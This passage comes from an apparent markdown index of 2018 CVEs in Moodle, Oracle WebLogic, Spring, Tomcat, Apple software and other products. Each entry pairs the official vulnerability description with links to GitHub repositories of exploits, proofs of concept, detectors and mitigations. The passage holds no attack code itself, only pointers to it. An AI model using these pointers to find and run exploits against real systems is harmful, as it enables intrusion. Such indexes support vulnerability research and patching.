CVE-2018-1013, CVE-2018-1015, CVE-2018-1016. + + +- [ymgh96/Detecting-the-patch-of-CVE-2018-1010](https://github.com/ymgh96/Detecting-the-patch-of-CVE-2018-1010) + +### CVE-2018-1026 (2018-04-12) + +A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability." This affects Microsoft Office. This CVE ID is unique from CVE-2018-1030. + + +- [ymgh96/Detecting-the-CVE-2018-1026-and-its-patch](https://github.com/ymgh96/Detecting-the-CVE-2018-1026-and-its-patch) + +### CVE-2018-1042 (2018-01-22) + +Moodle 3.x has Server Side Request Forgery in the filepicker. + + +- [UDPsycho/Moodle-CVE-2018-1042](https://github.com/UDPsycho/Moodle-CVE-2018-1042) + +### CVE-2018-1088 (2018-04-18) + +A privilege escalation flaw was found in gluster 3.x snapshot scheduler. Any gluster client allowed to mount gluster volumes could also mount shared gluster storage volume and escalate privileges by scheduling malicious cronjob via symlink. + + +- [MauroEldritch/GEVAUDAN](https://github.com/MauroEldritch/GEVAUDAN) + +### CVE-2018-1111 (2018-05-17) + +DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol. + + +- [knqyf263/CVE-2018-1111](https://github.com/knqyf263/CVE-2018-1111) +- [kkirsche/CVE-2018-1111](https://github.com/kkirsche/CVE-2018-1111) +- [baldassarreFe/FEP3370-advanced-ethical-hacking](https://github.com/baldassarreFe/FEP3370-advanced-ethical-hacking) + +### CVE-2018-1123 (2018-05-23) + +procps-ng before version 3.3.15 is vulnerable to a denial of service in ps via mmap buffer overflow. Inbuilt protection in ps maps a guard page at the end of the overflowed buffer, ensuring that the impact of this flaw is limited to a crash (temporary denial of service). + + +- [aravinddathd/CVE-2018-1123](https://github.com/aravinddathd/CVE-2018-1123) + +### CVE-2018-1133 (2018-05-25) + +An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection. + + +- [darrynten/MoodleExploit](https://github.com/darrynten/MoodleExploit) +- [Feidao-fei/MOODLE-3.X-Remote-Code-Execution](https://github.com/Feidao-fei/MOODLE-3.X-Remote-Code-Execution) +- [That-Guy-Steve/CVE-2018-1133-Exploit](https://github.com/That-Guy-Steve/CVE-2018-1133-Exploit) + +### CVE-2018-1160 (2018-12-20) + +Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution. + + +- [SachinThanushka/CVE-2018-1160](https://github.com/SachinThanushka/CVE-2018-1160) + +### CVE-2018-1207 (2018-03-23) + +Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. + + +- [mgargiullo/cve-2018-1207](https://github.com/mgargiullo/cve-2018-1207) +- [un4gi/CVE-2018-1207](https://github.com/un4gi/CVE-2018-1207) + +### CVE-2018-1235 (2018-05-29) + +Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege. + + +- [AbsoZed/CVE-2018-1235](https://github.com/AbsoZed/CVE-2018-1235) + +### CVE-2018-1259 (2018-05-11) + +Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data's projection-based request payload binding to access arbitrary files on the system. + + +- [tafamace/CVE-2018-1259](https://github.com/tafamace/CVE-2018-1259) + +### CVE-2018-1263 (2018-05-15) + +Addresses partial fix in CVE-2018-1261. Pivotal spring-integration-zip, versions prior to 1.0.2, exposes an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder. + + +- [sakib570/CVE-2018-1263-Demo](https://github.com/sakib570/CVE-2018-1263-Demo) + +### CVE-2018-1270 (2018-04-06) + +Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. + + +- [CaledoniaProject/CVE-2018-1270](https://github.com/CaledoniaProject/CVE-2018-1270) +- [genxor/CVE-2018-1270_EXP](https://github.com/genxor/CVE-2018-1270_EXP) +- [tafamace/CVE-2018-1270](https://github.com/tafamace/CVE-2018-1270) +- [Venscor/CVE-2018-1270](https://github.com/Venscor/CVE-2018-1270) +- [mprunet/owasp-formation-cve-2018-1270](https://github.com/mprunet/owasp-formation-cve-2018-1270) + +### CVE-2018-1273 (2018-04-11) + +Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + + +- [knqyf263/CVE-2018-1273](https://github.com/knqyf263/CVE-2018-1273) +- [wearearima/poc-cve-2018-1273](https://github.com/wearearima/poc-cve-2018-1273) +- [webr0ck/poc-cve-2018-1273](https://github.com/webr0ck/poc-cve-2018-1273) +- [cved-sources/cve-2018-1273](https://github.com/cved-sources/cve-2018-1273) +- [jas502n/cve-2018-1273](https://github.com/jas502n/cve-2018-1273) + +### CVE-2018-1285 (2020-05-11) + +Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files. + + +- [alex-ermolaev/Log4NetSolarWindsSNMP-](https://github.com/alex-ermolaev/Log4NetSolarWindsSNMP-) + +### CVE-2018-1288 (2018-07-26) + +In Apache Kafka 0.9.0.0 to 0.9.0.1, 0.10.0.0 to 0.10.2.1, 0.11.0.0 to 0.11.0.2, and 1.0.0, authenticated Kafka users may perform action reserved for the Broker via a manually created fetch request interfering with data replication, resulting in data loss. + + +- [joegallagher4/CVE-2018-1288-](https://github.com/joegallagher4/CVE-2018-1288-) + +### CVE-2018-1297 (2018-02-13) + +When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code. + + +- [Al1ex/CVE-2018-1297](https://github.com/Al1ex/CVE-2018-1297) +- [48484848484848/Jmeter-CVE-2018-1297-](https://github.com/48484848484848/Jmeter-CVE-2018-1297-) + +### CVE-2018-1304 (2018-02-28) + +The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected. + + +- [knqyf263/CVE-2018-1304](https://github.com/knqyf263/CVE-2018-1304) +- [thariyarox/tomcat_CVE-2018-1304_testing](https://github.com/thariyarox/tomcat_CVE-2018-1304_testing) + +### CVE-2018-1305 (2018-02-23) + +Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them. + + +- [Pa55w0rd/CVE-2018-1305](https://github.com/Pa55w0rd/CVE-2018-1305) + +### CVE-2018-1306 (2018-06-27) + +The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information. + + +- [JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306](https://github.com/JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306) + +### CVE-2018-1311 (2019-12-18) + +The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable. + + +- [johnjamesmccann/xerces-3.2.3-DTD-hotfix](https://github.com/johnjamesmccann/xerces-3.2.3-DTD-hotfix) + +### CVE-2018-1313 (2018-05-07) + +In Apache Derby 10.3.1.4 to 10.14.1.0, a specially-crafted network packet can be used to request the Derby Network Server to boot a database whose location and contents are under the user's control. If the Derby Network Server is not running with a Java Security Manager policy file, the attack is successful. If the server is using a policy file, the policy file must permit the database location to be read for the attack to work. The default Derby Network Server policy file distributed with the affected releases includes a permissive policy as the default Network Server policy, which allows the attack to work. + + +- [tafamace/CVE-2018-1313](https://github.com/tafamace/CVE-2018-1313) + +### CVE-2018-1324 (2018-03-16) + +A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package. + + +- [tafamace/CVE-2018-1324](https://github.com/tafamace/CVE-2018-1324) + +### CVE-2018-1335 (2018-04-25) + +From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18. + + +- [SkyBlueEternal/CVE-2018-1335-EXP-GUI](https://github.com/SkyBlueEternal/CVE-2018-1335-EXP-GUI) +- [N0b1e6/CVE-2018-1335-Python3](https://github.com/N0b1e6/CVE-2018-1335-Python3) +- [canumay/cve-2018-1335](https://github.com/canumay/cve-2018-1335) +- [siramk/CVE-2018-1335](https://github.com/siramk/CVE-2018-1335) +- [DigitalNinja00/CVE-2018-1335](https://github.com/DigitalNinja00/CVE-2018-1335) + +### CVE-2018-1932 (2019-01-08) + +IBM API Connect 5.0.0.0 through 5.0.8.4 is affected by a vulnerability in the role-based access control in the management server that could allow an authenticated user to obtain highly sensitive information. IBM X-Force ID: 153175. + + +- [BKreisel/CVE-2018-1932X](https://github.com/BKreisel/CVE-2018-1932X) + +### CVE-2018-2380 (2018-03-01) + +SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing "traverse to parent directory" are passed through to the file APIs. + + +- [erpscanteam/CVE-2018-2380](https://github.com/erpscanteam/CVE-2018-2380) + +### CVE-2018-2392 (2018-02-14) + +Under certain conditions SAP Internet Graphics Server (IGS) 7.20, 7.20EXT, 7.45, 7.49, 7.53, fails to validate XML External Entity appropriately causing the SAP Internet Graphics Server (IGS) to become unavailable. + + +- [Vladimir-Ivanov-Git/sap_igs_xxe](https://github.com/Vladimir-Ivanov-Git/sap_igs_xxe) + +### CVE-2018-2628 (2018-04-19) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [forlin/CVE-2018-2628](https://github.com/forlin/CVE-2018-2628) +- [shengqi158/CVE-2018-2628](https://github.com/shengqi158/CVE-2018-2628) +- [skydarker/CVE-2018-2628](https://github.com/skydarker/CVE-2018-2628) +- [jiansiting/weblogic-cve-2018-2628](https://github.com/jiansiting/weblogic-cve-2018-2628) +- [zjxzjx/CVE-2018-2628-detect](https://github.com/zjxzjx/CVE-2018-2628-detect) +- [aedoo/CVE-2018-2628-MultiThreading](https://github.com/aedoo/CVE-2018-2628-MultiThreading) +- [victor0013/CVE-2018-2628](https://github.com/victor0013/CVE-2018-2628) +- [9uest/CVE-2018-2628](https://github.com/9uest/CVE-2018-2628) +- [Shadowshusky/CVE-2018-2628all](https://github.com/Shadowshusky/CVE-2018-2628all) +- [shaoshore/CVE-2018-2628](https://github.com/shaoshore/CVE-2018-2628) +- [tdy218/ysoserial-cve-2018-2628](https://github.com/tdy218/ysoserial-cve-2018-2628) +- [wrysunny/cve-2018-2628](https://github.com/wrysunny/cve-2018-2628) +- [jas502n/CVE-2018-2628](https://github.com/jas502n/CVE-2018-2628) +- [stevenlinfeng/CVE-2018-2628](https://github.com/stevenlinfeng/CVE-2018-2628) +- [likekabin/CVE-2018-2628](https://github.com/likekabin/CVE-2018-2628) +- [Nervous/WebLogic-RCE-exploit](https://github.com/Nervous/WebLogic-RCE-exploit) +- [Lighird/CVE-2018-2628](https://github.com/Lighird/CVE-2018-2628) +- [0xMJ/CVE-2018-2628](https://github.com/0xMJ/CVE-2018-2628) +- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner) +- [seethen/cve-2018-2628](https://github.com/seethen/cve-2018-2628) +- [BabyTeam1024/cve-2018-2628](https://github.com/BabyTeam1024/cve-2018-2628) +- [cscadoge/weblogic-cve-2018-2628](https://github.com/cscadoge/weblogic-cve-2018-2628) + +### CVE-2018-2636 (2018-01-18) + +Vulnerability in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (subcomponent: Security). Supported versions that are affected are 2.7, 2.8 and 2.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Simphony. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Simphony. CVSS 3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [erpscanteam/CVE-2018-2636](https://github.com/erpscanteam/CVE-2018-2636) +- [Cymmetria/micros_honeypot](https://github.com/Cymmetria/micros_honeypot) + +### CVE-2018-2844 (2018-04-19) + +Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). + + +- [renorobert/virtualbox-cve-2018-2844](https://github.com/renorobert/virtualbox-cve-2018-2844) + +### CVE-2018-2879 (2018-04-19) + +Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Authentication Engine). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. While the vulnerability is in Oracle Access Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. Note: Please refer to Doc ID <a href="http://support.oracle.com/CSP/main/article?cmd=show&type=NOT&id=2386496.1">My Oracle Support Note 2386496.1 for instructions on how to address this issue. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H). + + +- [MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit](https://github.com/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit) +- [AymanElSherif/oracle-oam-authentication-bypas-exploit](https://github.com/AymanElSherif/oracle-oam-authentication-bypas-exploit) +- [redtimmy/OAMBuster](https://github.com/redtimmy/OAMBuster) + +### CVE-2018-2893 (2018-07-18) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [sry309/CVE-2018-2893](https://github.com/sry309/CVE-2018-2893) +- [artofwar344/CVE-2018-2893](https://github.com/artofwar344/CVE-2018-2893) +- [bigsizeme/CVE-2018-2893](https://github.com/bigsizeme/CVE-2018-2893) +- [pyn3rd/CVE-2018-2893](https://github.com/pyn3rd/CVE-2018-2893) +- [qianl0ng/CVE-2018-2893](https://github.com/qianl0ng/CVE-2018-2893) +- [jas502n/CVE-2018-2893](https://github.com/jas502n/CVE-2018-2893) +- [ianxtianxt/CVE-2018-2893](https://github.com/ianxtianxt/CVE-2018-2893) + +### CVE-2018-2894 (2018-07-18) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [111ddea/cve-2018-2894](https://github.com/111ddea/cve-2018-2894) +- [LandGrey/CVE-2018-2894](https://github.com/LandGrey/CVE-2018-2894) +- [jas502n/CVE-2018-2894](https://github.com/jas502n/CVE-2018-2894) +- [k8gege/PyLadon](https://github.com/k8gege/PyLadon) + +### CVE-2018-3191 (2018-10-17) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [arongmh/CVE-2018-3191](https://github.com/arongmh/CVE-2018-3191) +- [m00zh33/CVE-2018-3191](https://github.com/m00zh33/CVE-2018-3191) +- [Libraggbond/CVE-2018-3191](https://github.com/Libraggbond/CVE-2018-3191) +- [jas502n/CVE-2018-3191](https://github.com/jas502n/CVE-2018-3191) +- [mackleadmire/CVE-2018-3191-Rce-Exploit](https://github.com/mackleadmire/CVE-2018-3191-Rce-Exploit) + +### CVE-2018-3245 (2018-10-17) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [pyn3rd/CVE-2018-3245](https://github.com/pyn3rd/CVE-2018-3245) +- [jas502n/CVE-2018-3245](https://github.com/jas502n/CVE-2018-3245) +- [ianxtianxt/CVE-2018-3245](https://github.com/ianxtianxt/CVE-2018-3245) + +### CVE-2018-3252 (2018-10-17) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [jas502n/CVE-2018-3252](https://github.com/jas502n/CVE-2018-3252) +- [go-spider/CVE-2018-3252](https://github.com/go-spider/CVE-2018-3252) +- [pyn3rd/CVE-2018-3252](https://github.com/pyn3rd/CVE-2018-3252) + +### CVE-2018-3260 +- [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck) + +### CVE-2018-3295 (2018-10-17) + +Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). The supported version that is affected is Prior to 5.2.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H). + + +- [ndureiss/e1000_vulnerability_exploit](https://github.com/ndureiss/e1000_vulnerability_exploit) +- [jeongzero8732/cve-2018-3295](https://github.com/jeongzero8732/cve-2018-3295) + +### CVE-2018-3608 (2018-07-06) + +A vulnerability in Trend Micro Maximum Security's (Consumer) 2018 (versions 12.0.1191 and below) User-Mode Hooking (UMH) driver could allow an attacker to create a specially crafted packet that could alter a vulnerable system in such a way that malicious code could be injected into other processes. + + +- [gguaiker/Trend_Micro_POC](https://github.com/gguaiker/Trend_Micro_POC) + +### CVE-2018-3639 (2018-05-22) + +Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4. + + +- [tyhicks/ssbd-tools](https://github.com/tyhicks/ssbd-tools) +- [malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate](https://github.com/malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate) +- [mmxsrup/CVE-2018-3639](https://github.com/mmxsrup/CVE-2018-3639) +- [Shuiliusheng/CVE-2018-3639-specter-v4-](https://github.com/Shuiliusheng/CVE-2018-3639-specter-v4-) + +### CVE-2018-3760 (2018-06-26) + +There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately. + + +- [mpgn/CVE-2018-3760](https://github.com/mpgn/CVE-2018-3760) +- [cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-](https://github.com/cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-) +- [wudidwo/CVE-2018-3760-poc](https://github.com/wudidwo/CVE-2018-3760-poc) + +### CVE-2018-3783 (2018-08-17) + +A privilege escalation detected in flintcms versions <= 1.1.9 allows account takeover due to blind MongoDB injection in password reset. + + +- [nisaruj/nosqli-flintcms](https://github.com/nisaruj/nosqli-flintcms) + +### CVE-2018-3786 (2018-08-24) + +A command injection vulnerability in egg-scripts <v2.8.1 allows arbitrary shell command execution through a maliciously crafted command line argument. + + +- [erik-krogh/egg-scripts-CVE-2018-3786](https://github.com/erik-krogh/egg-scripts-CVE-2018-3786) + +### CVE-2018-3810 (2018-01-01) + +Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + + +- [lucad93/CVE-2018-3810](https://github.com/lucad93/CVE-2018-3810) +- [cved-sources/cve-2018-3810](https://github.com/cved-sources/cve-2018-3810) +- [nth347/CVE-2018-3810_exploit](https://github.com/nth347/CVE-2018-3810_exploit) + +### CVE-2018-3811 (2018-01-01) + +SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did not use prepared statements and did not sanitize the $_POST["oId"] variable before passing it as input into the SQL query. + + +- [cved-sources/cve-2018-3811](https://github.com/cved-sources/cve-2018-3811) + +### CVE-2018-4013 (2018-10-19) + +An exploitable code execution vulnerability exists in the HTTP packet-parsing functionality of the LIVE555 RTSP server library version 0.92. A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this vulnerability. + + +- [DoubleMice/cve-2018-4013](https://github.com/DoubleMice/cve-2018-4013) +- [r3dxpl0it/RTSPServer-Code-Execution-Vulnerability](https://github.com/r3dxpl0it/RTSPServer-Code-Execution-Vulnerability) + +### CVE-2018-4084 (2018-04-03) + +An issue was discovered in certain Apple products. macOS before 10.13.3 is affected. The issue involves the "Wi-Fi" component. It allows attackers to bypass intended memory-read restrictions via a crafted app. + + +- [dybrkr/wifi_leak](https://github.com/dybrkr/wifi_leak) + +### CVE-2018-4087 (2018-04-03) + +An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the "Core Bluetooth" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. + + +- [rani-i/bluetoothdPoC](https://github.com/rani-i/bluetoothdPoC) +- [MTJailed/UnjailMe](https://github.com/MTJailed/UnjailMe) +- [joedaguy/Exploit11.2](https://github.com/joedaguy/Exploit11.2) + +### CVE-2018-4110 (2018-04-03) + +An issue was discovered in certain Apple products. iOS before 11.3 is affected. The issue involves the "Web App" component. It allows remote attackers to bypass intended restrictions on cookie persistence. + + +- [bencompton/ios11-cookie-set-expire-issue](https://github.com/bencompton/ios11-cookie-set-expire-issue) + +### CVE-2018-4121 (2018-04-03) + +An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. + + +- [FSecureLABS/CVE-2018-4121](https://github.com/FSecureLABS/CVE-2018-4121) +- [likekabin/CVE-2018-4121](https://github.com/likekabin/CVE-2018-4121) +- [jezzus/CVE-2018-4121](https://github.com/jezzus/CVE-2018-4121) + +### CVE-2018-4124 (2018-04-03) + +An issue was discovered in certain Apple products. iOS before 11.2.6 is affected. macOS before 10.13.3 Supplemental Update is affected. tvOS before 11.2.6 is affected. watchOS before 4.2.3 is affected. The issue involves the "CoreText" component. It allows remote attackers to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via a crafted string containing a certain Telugu character. + + +- [jamf/TELUGU_CVE-2018-4124_POC](https://github.com/jamf/TELUGU_CVE-2018-4124_POC) + +### CVE-2018-4150 (2018-04-03) + +An issue was discovered in certain Apple products. iOS before 11.3 is affected. macOS before 10.13.4 is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. + + +- [Jailbreaks/CVE-2018-4150](https://github.com/Jailbreaks/CVE-2018-4150) +- [rpwnage/LovelySn0w](https://github.com/rpwnage/LovelySn0w) +- [littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-](https://github.com/littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-) + +### CVE-2018-4185 (2019-01-11) + +In iOS before 11.3, tvOS before 11.3, watchOS before 4.3, and macOS before High Sierra 10.13.4, an information disclosure issue existed in the transition of program state. This issue was addressed with improved state handling. + + +- [bazad/x18-leak](https://github.com/bazad/x18-leak) +- [xigexbh/bazad1](https://github.com/xigexbh/bazad1) +- [Giler2004/bazad1](https://github.com/Giler2004/bazad1) + +### CVE-2018-4193 (2018-06-08) + +An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Windows Server" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. + + +- [Synacktiv-contrib/CVE-2018-4193](https://github.com/Synacktiv-contrib/CVE-2018-4193) + +### CVE-2018-4233 (2018-06-08) + +An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. + + +- 